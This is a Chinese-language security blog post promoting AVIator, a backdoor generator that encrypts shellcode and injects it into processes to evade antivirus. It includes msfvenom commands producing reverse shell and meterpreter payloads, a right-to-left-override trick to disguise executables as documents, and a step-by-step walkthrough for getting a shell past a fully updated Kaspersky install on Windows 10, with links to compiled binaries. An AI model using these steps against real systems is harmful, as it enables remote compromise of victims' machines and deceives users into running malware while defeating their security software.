1. 首页
  2. 工具分享

AVIator:使用加密和注入技术来绕过AV检测 3/71

AVIator:使用加密和注入技术来绕过AV检测 3/71-ChaBug安全

Ator是一个后门生成器实用程序,它使用加密和注入技术来绕过AV检测。进一步来说:

  • 它使用AES加密来加密给定的shellcode
  • 生成包含加密有效负载的可执行文件
  • 使用各种注入技术将shellcode解密并注入目标系统

进程注入 ]:

  1. 便携式可执行注入,包括将恶意代码直接写入进程(没有磁盘上的文件),然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化,例如反射DLL注入(将自映射DLL写入进程)和内存模块(写入进程时映射DLL)克服了地址重定位问题。
  2. 线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似,必须首先暂停该线程。

用法

该应用程序有一个由三个主要输入组成的表单(见下面的截图):

AVIator:使用加密和注入技术来绕过AV检测 3/71-ChaBug安全
  1. 包含用于加密shellcode的加密密钥的文本
  2. 包含用于AES加密的IV的文本
  3. 包含shellcode的文本

重要提示:shellcode应作为C#字节数组提供。

默认值包含执行notepad.exe(32位)的shellcode。提供此演示作为代码应如何形成的指示(使用msfvenom,可以使用-f csharp开关轻松完成,例如msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = XXXX -f csharp)。

在填充提供的输入并选择输出路径之后,根据所选择的选项生成可执行文件。

RTLO选项

简单来说,欺骗可执行文件看起来像“无辜”扩展,如’pdf’,’txt’等。例如文件“testcod.exe”将被解释为“tesexe.doc”

请注意,某些AV会将恶搞作为恶意软件提醒自己。

设置自定义图标

我想你们都知道它是什么:)

在Win 10 x64主机上绕过卡巴斯基AV(TEST CASE)

在运行完全更新的卡巴斯基AV的Windows 10机器中获取shell

目标机器:Windows 10 x64

  1. 使用msfvenom创建有效负载msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
  2. 使用AVIator进行以下设置目标OS体系结构:x64

    注入技术:线程劫持(Shellcode Arch:x64,OS arch:x64)

    目标程序:资源管理器(保留默认值)

  3. 在攻击者计算机上设置侦听器
  4. 在受害计算机上运行生成的exe

安装

Windows:

编译项目或从以下文件夹下载allready编译的可执行文件:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

根据您的Linux发行版安装Mono,下载并运行二进制文件

例如在kali:

详细内容移步https://github.com/Ch0pin/AVIator

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code